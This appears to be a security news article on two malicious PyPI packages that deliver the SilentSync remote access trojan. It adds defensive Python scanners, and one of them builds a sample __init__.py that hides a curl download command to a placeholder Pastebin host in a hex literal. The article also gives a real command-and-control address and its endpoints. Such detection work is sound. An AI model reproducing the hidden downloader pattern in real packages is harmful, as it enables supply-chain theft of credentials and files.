
Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync to Windows systems.
“SilentSync allows you to execute remote commands, remove files, and screen capture,” said Manisha Ramcharan Prajapati and Satyam Singh of Zscaler ThreatLabz. “SilentSync also extracts web browser data such as credentials, history, autofill data, and cookies from web browsers such as Chrome, Brave, Edge, and Firefox.”
The packages, which are no longer available to download from PyPI, are listed below. Both were uploaded by a user named “condetgapis”.

- sisaws (201 downloads)
- secmeasure (627 downloads)

Zscaler said the sisaws package mimics the behavior of the legitimate Python package sisa, which relates to Argentina's national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA).
What the library actually contains is a function called “gen_token()” in its initialization script (__init__.py) that acts as a downloader for the next-stage malware. To blend in, it takes a hardcoded token as input and returns a secondary static token as the response, in the same manner as the legitimate SISA API.
“When a developer imports the SISAWS package and calls the gen_token function, the code decodes a hex command that reveals a curl command, which is used to retrieve additional Python scripts,” the researchers said. “The Python script obtained from Pastebin is written to the file helper.py in a temporary directory and executed.”
SecMeasure similarly poses as a “library for cleaning strings and applying security measures,” but embeds functionality to drop the SilentSync RAT.
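The downloader pattern described above (a long hex string literal in __init__.py that decodes to a curl command fetching a script from Pastebin, which is then written to a temporary directory and executed) can be hunted for statically. The following is an added example written for this article, not code from the packages or from Zscaler: it decodes long hex literals in Python source and flags those that decode to download-and-execute indicators. The sample __init__.py it scans is constructed here in the shape the report describes; the Pastebin URL in it is a placeholder.

```python
import binascii
import os
import re

# Substrings that, once a hex literal is decoded, suggest a download-and-execute
# stage of the kind the report describes (curl to Pastebin, exec of the result).
SUSPICIOUS_DECODED = ("curl", "pastebin", "exec(", "tempfile", "subprocess")

# Quoted literal made only of hex digits, long enough to be a command rather than a hash prefix.
HEX_LITERAL = re.compile(r"""["']([0-9a-fA-F]{16,})["']""")


def decode_hex_literals(source: str) -> list[str]:
    """Return the decoded text of every long hex string literal in a Python source file."""
    decoded = []
    for match in HEX_LITERAL.finditer(source):
        raw = match.group(1)
        if len(raw) % 2:
            continue
        try:
            text = binascii.unhexlify(raw).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        # Only keep decodings that are readable text; random bytes are not a command.
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def scan_source(source: str) -> list[str]:
    """Flag decoded hex literals that contain download-and-execute indicators."""
    findings = []
    for text in decode_hex_literals(source):
        hits = [k for k in SUSPICIOUS_DECODED if k in text.lower()]
        if hits:
            findings.append(f"hex literal decodes to {text!r} (matches: {', '.join(hits)})")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every __init__.py under root (for example a site-packages directory)."""
    results = {}
    for dirpath, _, files in os.walk(root):
        if "__init__.py" in files:
            path = os.path.join(dirpath, "__init__.py")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            if findings:
                results[path] = findings
    return results


# Constructed sample input: a gen_token() that hides a curl command in a hex literal.
# This mirrors the shape the report describes; it is not the real package code and
# the URL is a placeholder.
ENCODED_CMD = "curl -s https://pastebin.example/raw/PLACEHOLDER -o helper.py".encode().hex()
SAMPLE_INIT = (
    "import os, subprocess, tempfile\n"
    "def gen_token(token):\n"
    '    cmd = bytes.fromhex("' + ENCODED_CMD + '").decode()\n'
    "    os.system(cmd)\n"
    '    return "static-secondary-token"\n'
)

# Constructed benign sample: a package whose gen_token() does nothing suspicious.
BENIGN_INIT = (
    'VERSION = "1.0"\n'
    "def gen_token(token):\n"
    "    return token[::-1]\n"
)

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_INIT), ("benign", BENIGN_INIT)):
        print(name, scan_source(src))
```

The scan is deliberately narrow: it only decodes hex literals, so a package that builds the command by other means will not trip it. It is a cheap first pass over a virtual environment or a CI artifact, to be followed by a proper review of anything it flags.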

SilentSync primarily targets Windows systems at this stage, but the malware also ships with built-in functions for Linux and macOS: it modifies the Registry on Windows, edits the crontab file on Linux to run the payload at system startup, and registers a LaunchAgent on macOS.
The package uses the secondary token to send an HTTP GET request to a hardcoded endpoint (200.58.107[.]25) and receives Python code that is executed directly in memory. The server supports four different endpoints:

- /checkin: check connectivity
- /comando: receive a command to run
- /respuesta: send a status message
- /archivo: send command output or stolen data
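The four endpoints above give a defender a compact network signature: a host that checks in, fetches a command, and then posts results or files to the same address. The following is an added example written for this article, not code from Zscaler or from the malware: it parses constructed HTTP proxy log lines, matches requests against the reported server address (kept defanged in the constant and refanged only for comparison), and reports which internal hosts went beyond the connectivity check. The log format and the HTTP methods on the response endpoints are assumptions for the sample; the report only states that code retrieval uses GET.

```python
import re
from collections import defaultdict
from typing import Optional

# Server address as reported (defanged). Refanged only when comparing against log hosts.
C2_HOST_DEFANGED = "200.58.107[.]25"
C2_HOST = C2_HOST_DEFANGED.replace("[.]", ".")

# Endpoint purposes as listed in the report.
C2_PATHS = {
    "/checkin": "connectivity check",
    "/comando": "command retrieval",
    "/respuesta": "status message",
    "/archivo": "command output or stolen-data upload",
}

# Assumed proxy log shape: "<timestamp> <source-ip> <METHOD> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) "
    r"https?://(?P<host>[^/\s]+)(?P<path>/\S*)"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one proxy log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def c2_hits(log_text: str) -> list[dict]:
    """Return every request to the reported server, annotated with the endpoint purpose."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["host"] == C2_HOST:
            rec["purpose"] = C2_PATHS.get(rec["path"], "unknown endpoint")
            hits.append(rec)
    return hits


def beaconing_sources(log_text: str) -> dict[str, list[str]]:
    """Map each source that checked in and then used another endpoint to its endpoint sequence.

    A lone /checkin could be a scanner or a sandbox; a check-in followed by /comando,
    /respuesta or /archivo from the same source looks like an active implant.
    """
    sequences = defaultdict(list)
    for rec in c2_hits(log_text):
        sequences[rec["src"]].append(rec["path"])
    return {
        src: paths
        for src, paths in sequences.items()
        if "/checkin" in paths and len(set(paths)) > 1
    }


# Constructed sample log: one host completing a full beacon cycle, one benign request,
# and one host that only checked in. Methods on the upload endpoints are assumed.
SAMPLE_LOG = "\n".join([
    f"2025-09-10T12:00:01Z 10.0.0.5 GET http://{C2_HOST}/checkin 200",
    f"2025-09-10T12:00:02Z 10.0.0.5 GET http://{C2_HOST}/comando 200",
    f"2025-09-10T12:00:09Z 10.0.0.5 POST http://{C2_HOST}/respuesta 200",
    f"2025-09-10T12:00:15Z 10.0.0.5 POST http://{C2_HOST}/archivo 200",
    "2025-09-10T12:01:00Z 10.0.0.7 GET https://pypi.org/simple/requests/ 200",
    f"2025-09-10T12:02:00Z 10.0.0.9 GET http://{C2_HOST}/checkin 200",
])

if __name__ == "__main__":
    for rec in c2_hits(SAMPLE_LOG):
        print(rec["ts"], rec["src"], rec["path"], "->", rec["purpose"])
    print("beaconing:", beaconing_sources(SAMPLE_LOG))
```

Because the payload is fetched and run in memory, the network side is often the only durable trace on a host without endpoint telemetry; the sequence check above is the part worth keeping even after the IP address itself stops being useful.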

The malware can harvest browser data, run shell commands, capture screenshots, and steal files. It can also exfiltrate entire files and directories in the form of a ZIP archive. Once the data is sent, all artifacts are removed from the host in an effort to sidestep detection.
“The discovery of the malicious PyPI packages SISAWS and SecMeasure highlights the increased risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging typosquatting, impersonating a legitimate package, threat actors can access personally identifiable information (PII).”